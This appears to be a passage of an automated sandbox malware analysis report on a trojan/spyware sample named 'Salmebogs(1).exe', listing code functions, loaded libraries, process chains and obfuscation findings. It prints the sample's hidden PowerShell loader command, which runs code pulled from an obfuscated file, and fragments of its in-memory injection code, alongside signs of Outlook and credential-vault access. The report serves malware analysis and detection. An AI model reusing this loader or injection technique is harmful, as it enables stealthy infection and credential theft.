            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034FFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03103F08
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00761D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_007511B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00765430
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00763630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0077BB20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075CC30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075CC27
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075AE50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075CE50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075AFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0075AF94
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 266 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 88 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
            Source: Salmebogs(1).exe, 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameeftervisninger luftfartjs.exe0 vs Salmebogs(1).exe
            Source: Salmebogs(1).exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/12@8/7
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_0040458C GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Code function: 0_2_00402095 CoCreateInstance
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | File created: C:\Users\user\AppData\Roaming\aspern
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | File created: C:\Users\user\AppData\Local\Temp\nssFA60.tmp
            Source: Salmebogs(1).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Salmebogs(1).exe | ReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | File read: C:\Users\user\Desktop\Salmebogs(1).exe
            Source: unknown | Process created: C:\Users\user\Desktop\Salmebogs(1).exe "C:\Users\user\Desktop\Salmebogs(1).exe"
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Salmebogs(1).exe | Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Salmebogs(1).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Salmebogs(1).exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Semiaci.Absorbe$PotboysWsabbathaAbominarUnbraineIvr.stthVate maoG dekryu ndustrsGratinei UndervnNeelaprgaktor t Katharo(La,dsheTUltra orFe ruaraLyophilnRaspninsKaraktepEvenso.iAfstrafrV nillieSkjtelbdShulslb Tillokk' Genera ForsimpKc,clamieHallah sRecipietOscillor grinnieJa akar$TomatpuScryp ozl Nedkasakett,emvDelatine alvinisUndefaujPubianlp Openes BisageraFo raad Sni ter SmaaskoT iotunsHexateutSpea erhTapperiSMaila,lknonpurirOfficeraToxemiaaAthletilEla.ticeTuumbjeoPepoa opReserveeHjarne,lStormfauConfedeblin smelTestame fejlr dt Microc,ReincaruTerapeusPopolarsBagtjsdesailboar Tolvtav .ubobso pbygniDTrea riaOvermenlSuperbaeHypersenFinaleneBssepi.sGrvlingnRemi gtB rgentie reman aDeta.jetOverprou RisikotDrkikkeiG mbleroCycloheTCort deoCh,naner eleporpPo tordiFindelefOverdrei A dedus Weakyp,Kalkuleo idenumrOverbygt Crema,v CriticaPetu tssLitterruNo dige OrbatioCKo trolabjergnilA,drianfPromotikUdsalgsrAarvaagsWheneerLSt ngrio rerinddLokalplsLeopards C phalt.ubspac.Fetichd Interne AllophMrundioreEnnisindLan ingi O tregtNillek eF,mreap-C tacyluFibro.pdbris,remTvrs iteBerigtijKuns ans ndownlsolso.tbSclerozBBundedeeLoranstvOc,lusii Bullyb s rmforsTidsspitPrewelwx DormmiPOncominiForbehod hu tled EnclitlHomotheePoechorsUdsttelo LuvishEFreqfyrxMandssapUnd rsglo muntro MoseloiAbastartFilicalrDiatermHTrn.brnjGriz.lyeS.bdepumR ngvejm flbshue rossamvLanceri Burtyle CheweleC hanne BondmamMisplanpEfterbreForelstnco,peti$CantilaaUncrankcCubiconaSammen,tS oebruhLykketaa idtsamr Goobers KomparRUrm geraStripinm KardioaMegaloct ark,iseSalmonblInsuffitRecidivSDisc.mfiPens,onm B anch,TvillinlMicroneiUlighedsMamoncirFidolacA TalkvapLi,itoroDagsord .noglemhfunktiot Ansigth Poss saopalineFScoopinrTonnageaStriglegMaximilmKulhydreMetabionSponsora StoftrSEkstatilEnforciuFor,alisPrelatieAn,lebep navig oLej kastFigurae SystemrH samplivL nglyi.F gelejrBeboelid Te,lbraAftensmkOb.ekti,Marc raa PolitinBa knina SvovldaMa noliner dicae RedargtAudiber' Sa nci)backv,l 
source: powershell.exe, 00000002.00000002.3452317093.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \System.Core.pdb{ source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Stemmeurnes.exe, Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.3458185986.0000000008351000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match | File source: 00000006.00000002.3666544295.0000000003F01000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3459194862.000000000BAC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Guignol $Lacerable $gallimaufries), (Kyathoi @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hjsderne = [AppDomain]::CurrentDomain.GetAssemblies()$global:C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tilslutningspligts)), $straatktushfly).DefineDynamicModule($Suffices69, $false).DefineType($Forkasteligt, $Dictaen, [System.MulticastD
Source: C:\Users\user\Desktop\Salmebogs(1).exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_045AA492 pushfd ; ret (2_2_045AA4A1)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_045AE9F9 push eax; mov dword ptr [esp], edx (2_2_045AEA0C)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_074E1DF0 push 6CC34714h; ret (2_2_074E1FA5)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_074E32E4 push 6CC34714h; ret (2_2_074E332D)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FABA3C push ebp; retf (7_2_02FABA3F)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FB832B push ebp; iretd (7_2_02FB8336)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBC855 push 7D63EB29h; ret (7_2_02FBC85A)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBF9D3 push cs; ret (7_2_02FBF9AB)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBE9AA push esi; iretd (7_2_02FBE9AB)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FBF99F push cs; ret (7_2_02FBF9AB)
Source: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe | Code function: 7_2_02FAB6AF push es; iretd (7_2_02FAB6B3)
